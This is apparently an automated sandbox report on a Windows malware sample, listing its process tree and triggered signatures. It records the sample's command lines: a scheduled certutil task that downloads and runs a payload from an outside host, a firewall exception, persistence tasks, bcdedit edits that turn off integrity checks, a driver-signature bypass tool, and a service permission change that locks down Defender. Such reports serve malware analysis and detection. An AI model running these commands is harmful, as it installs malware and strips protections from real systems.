PID 1520 wrote to memory of 604  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 604  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 604  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1212  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1212  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1212  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1492  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1492  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1492  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1344  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1344  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1344  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 828  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 828  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 828  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1056  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1056  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1056  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1500  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1500  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1500  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1140  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1140  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1140  1520 patch.exe  bcdedit.exe
Processes (process tree; [n] is the nesting depth, each entry lists image path, command line and triggered signatures)
[1] C:\Users\Admin\AppData\Local\Temp\er.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\er.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\rundll32.exe
      command line: C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;1648
      - Blocklisted process makes network request
      - Modifies registry class
  [2] C:\Users\Admin\AppData\Local\Temp\er.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\er.exe"
      - Loads dropped DLL
      - Windows security modification
      - Adds Run key to start application
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\rundll32.exe
        command line: C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;692
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\netsh.exe
          command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          - Modifies data under HKEY_USERS
    [3] C:\Windows\rss\csrss.exe
        command line: C:\Windows\rss\csrss.exe ""
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\schtasks.exe
          command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          - Creates scheduled task(s)
      [4] C:\Windows\system32\schtasks.exe
          command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          - Creates scheduled task(s)
      [4] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Modifies system certificate store
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -timeout 0
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\system32\bcdedit.exe
            command line: C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            - Modifies boot configuration data using bcdedit
      [4] C:\Windows\system32\bcdedit.exe
          command line: C:\Windows\Sysnative\bcdedit.exe /v
          - Modifies boot configuration data using bcdedit
      [4] C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          command line: C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          - Executes dropped EXE
      [4] C:\Windows\windefender.exe
          command line: "C:\Windows\windefender.exe"
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          [6] C:\Windows\SysWOW64\sc.exe
              command line: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeC:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"5⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=ff0348af-e2e5-49ec-9491-e980d37feaea&browser=chrome6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6206e00,0x7fef6206e10,0x7fef6206e207⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1032,6807380835215427805,6139682239562725928,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1268 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe4⤵
- Executes dropped EXE
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Downloads